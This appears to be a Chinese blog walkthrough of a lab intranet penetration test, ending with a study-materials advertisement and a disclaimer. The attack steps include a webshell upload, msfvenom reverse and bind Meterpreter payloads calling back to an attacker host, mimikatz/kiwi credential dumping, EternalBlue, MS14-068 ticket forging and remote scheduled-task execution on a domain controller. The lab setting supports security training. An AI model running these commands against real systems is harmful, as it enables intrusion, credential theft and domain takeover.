记一次内网靶场渗透测试

准备工作

本次内网网络拓扑图如下所示，首先将WEB的IP 192.168.0.150改为192.168.0.3。

 

（一）测试过程

信息收集：

1. 对目标IP进行端口扫描。
sudo nmap -sS --open -Pn -p- -v 192.168.0.3

2.绑定hosts 192.168.0.3 www.webhack123.com ，访问网站首页出现一个thinkphp框架。

3.对网站进行目录扫描。

4.存在wc.db将其下载下来，使用工具打开，里面存在网站目录文件信息，查看网站目录信息后，可以了解网站的基本架构。

（二）检测过程

1. 通过前面的信息搜集，已经知道当前网站是thinkphp框架了，使用工具扫描一下常见的漏洞,发现存在日志泄漏。

2.在日志中泄漏了账号和密码的密文。

账号：admin

密文：74c774ef39b5b977c1fd59dbfc73c3e380a65aa3

3.通过解密获取密码明文web123。

4.前面对网站进行目录扫描，未发现网站管理后台，因此使用脚本来绑定 hosts 碰撞管理后台的子域名。

5. admin.webhack123.com就是网站的管理后台。

6.使用前面获取的管理员账号密码进行登录，可以测试发现验证码是存在缺陷，也可以使用大字典来爆破出管理员的密码。

7.进入网站后台，修改允许上传的类型，上传一句话木马。

8.使用蚁剑连接获取webshell。

9. 在当前主机先进行简单的信息搜集，当前用户为administrator且主机未安装杀软，存在双网卡192.168.0.0/24 10.10.10.0/24，存在域环境。

生成攻击载荷先上线msf：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999  -f exe>haha.exe

10.迁移进程获取明文密码。

migrate 600

load kiwi

creds_all

11.获取登录过当前主机的用户信息。

run post/windows/gather/enum_logged_on_users

12. 可以看到存在hackbox域的域用户web，本地管理员Administrator的密码为：!@#Qwe456

前面我们已经知道存在域环境，现在定位到域控为：dc.hackbox.com 10.10.10.149。

（三）域渗透过程

1. 前面知道该主机存在两个网卡,现在来对这两个网段的存活主机进行扫描，首先添加：

run autoroute -s 10.10.10.0/24

run autoroute -p

2. 对内网存活主机进行扫描，只存在10.10.10.149，也就是域控，且开放了445端口。

3.使用永恒之蓝试打，检测出存在永恒之蓝漏洞。

4. 反向shell失败原因未明，正向的shell是可以成功返回一个meterpreter，成功获取域控dc权限。

5. 测试使用MS14-068漏洞：使用这个 exp 需要一个普通域控用户， web 是域用户，但不知道密码。前面获取到用户Administrator的密码为!@#Qwe456，现尝试使用用户web和这个密码进行登录。

6.登录失败，但是密码应该是正确的，只是不是远程组。

7. #创建票据

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

Load kiwi

#清理票据

kerberos_ticket_purge

8.上传 mimikatz 注入票据 mimikatz # kerberos::ptc TGT_web@hackbox.com.ccache。

9.查看票据 klist。

10.成功访问dc域控。

11.现在来获取域控权限，生成一个正向的载荷：

msfvenom -p windows/meterpreter/bind_tcp  LPORT=9998  -f exe>bind.exe

copy命令复制到域控copy bind.exe \\dc\c$。

12. at命令执行计划任务运行bind.exe

net time \\dc

at \\dc 1:29:00 c:/bind.ex

13.成功获取域控权限。

14.迁移进程抓取明文密码。

15.至此已经拿下了域控的权限。

16.迁移到域管理员进程查看三个flag。

（四）总结

小星通过此次内网靶场测试的研究，加深了对内网系统的认识，熟练掌握了如何使用MSF完成整个打靶过程。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，需要点击下方链接即可前往获取 

读者福利 | CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

同时每个成长路线对应的板块都有配套的视频提供： 

大厂面试题

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料

所有资料共282G，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，可以扫描下方二维码或链接免费领取~ 

读者福利 | CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

特别声明：

此教程为纯技术分享！本教程的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本教程的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失。